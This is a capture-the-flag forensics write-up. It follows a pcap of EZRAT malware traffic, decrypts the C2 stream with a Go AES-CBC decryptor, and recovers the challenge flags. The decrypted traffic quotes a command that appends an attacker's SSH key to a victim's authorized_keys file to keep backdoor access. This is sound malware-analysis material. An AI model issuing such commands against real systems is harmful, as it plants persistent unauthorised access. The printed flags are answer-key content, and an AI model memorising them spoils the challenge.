Data Siege
Personal Rating: Hard
We are told that the flag is split into three parts.
We have a pcap file.
Searching for HTTP traffic, we have three sets of HTTP requests:
GET /nBISC4YJKs7j4I (tcp stream 2)
GET /nBISC4YJKs7j4I (tcp stream 3)
GET /aQ4caZ.exe (tcp stream 4)
The file is of interest. It looks like it's a Windows application called ScreenSpy.
In Wireshark you can export the executable at File > Export Objects > HTTP and choose the file:
TCP stream 1 shows this:
TCP stream 5, which is the last stream, contains a lot of data that looks like a bunch of base64-encoded strings. We can also see some malicious PowerShell commands.
After dissecting some of the code, we find this: 0r3d_1n_7h3_h34dqu4r73r5}
I extracted the exe file and found a version.txt that showed me that the file was a Client for EZRAT 0.1.6.1
I found this in the .text file: Very_S3cr3t_S
I loaded the file in Ghidra. I only found the string above there.
So far I think we have this: Very_S3cr3t_S 0r3d_1n_7h3_h34dqu4r73r5}
It came to mind that the executable is EZRAT 0.1.6.1 and that its traffic might be encrypted. And indeed, checking the application on GitHub, I found an encryption function. I also noticed that it's a C# application, which means that I could easily decompile the downloaded application and potentially read the encryption key.
ILSpy can be used to decompile the file, but it is only available for Windows.
A friend wrote a decryptor. The encryption key and IV could be found in the decompiled executable.
Decrypting TCP stream 5, which is the C2 communication, we find an SSH key that contains the last part of the flag:
cmd;C:;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 >> C:\Users\svc01.ssh\authorized_keys
HTB{c0mmun1c4710n5
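As an added illustration (this is neither the friend's decryptor nor EZRAT's own code), here is a small Go tool that does what such a decryptor has to do: walk the dumped stream line by line, base64-decode each message and decrypt it, skipping lines that are not messages. It assumes the client uses AES-CBC with PKCS#7 padding under a static key and IV; the key, IV and sample stream in `SampleStream` are constructed stand-ins for the values recovered from the decompiled executable.

```go
package main
import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"strings"
)

// DecryptMessage base64-decodes one dumped line and AES-CBC-decrypts it, validating the PKCS#7 padding.
func DecryptMessage(line string, key, iv []byte) ([]byte, error) {
	block, kerr := aes.NewCipher(key)
	ct, err := base64.StdEncoding.DecodeString(strings.TrimSpace(line))
	if kerr != nil || err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("bad key length, or line is not a base64-wrapped AES-CBC message")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1]) // PKCS#7: the last byte is the pad length and every pad byte equals it
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#7 padding: wrong key/IV, or not a message at all")
	}
	return pt[:len(pt)-n], nil
}

func EncryptMessage(pt, key, iv []byte) string { // inverse of DecryptMessage, used only to build the sample
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(key)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(ct)
}
// DecryptStream returns, in order, the plaintext of every line that decrypts; anything else is skipped.
func DecryptStream(stream string, key, iv []byte) (msgs []string) {
	for _, line := range strings.Split(stream, "\n") {
		if pt, err := DecryptMessage(line, key, iv); err == nil {
			msgs = append(msgs, string(pt))
		}
	}
	return msgs
}
// SampleStream is a constructed stand-in for the C2 dump (two encrypted commands around one junk line) under a constructed key and IV.
func SampleStream() (stream string, key, iv []byte) {
	key, iv = []byte("0123456789abcdef0123456789abcdef"), []byte("fedcba9876543210") // 32-byte key -> AES-256
	m1 := EncryptMessage([]byte(`cmd;C:;echo ssh-rsa AAAAB3Nza... HTB{c0mmun1c4710n5 >> C:\Users\svc01\.ssh\authorized_keys`), key, iv)
	m2 := EncryptMessage([]byte("cmd;C:;echo ...0r3d_1n_7h3_h34dqu4r73r5}"), key, iv)
	return m1 + "\nnot a message at all\n" + m2, key, iv // the junk line must be skipped, not abort the run
}
```

On the real capture you would feed the "Follow TCP Stream" dump of stream 5 to `DecryptStream` and grep the output for `HTB{` and `}`.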
So in total, we have this:
HTB{c0mmun1c4710n5 Very_S3cr3t_S 0r3d_1n_7h3_h34dqu4r73r5}
This would make sense but is wrong:
HTB{c0mmun1c4710n5_Very_S3cr3t_S70r3d_1n_7h3_h34dqu4r73r5}
The support told me that the Very_S3cr3t part is wrong and not part of the flag.
Okay, the second part of the flag was also part of the encrypted C2 traffic. We just made a mistake when copying it and left something out.
So we got: HTB{c0mmun1c4710n5_h45_b33n_r3570r3d_1n_7h3_h34dqu4r73r5}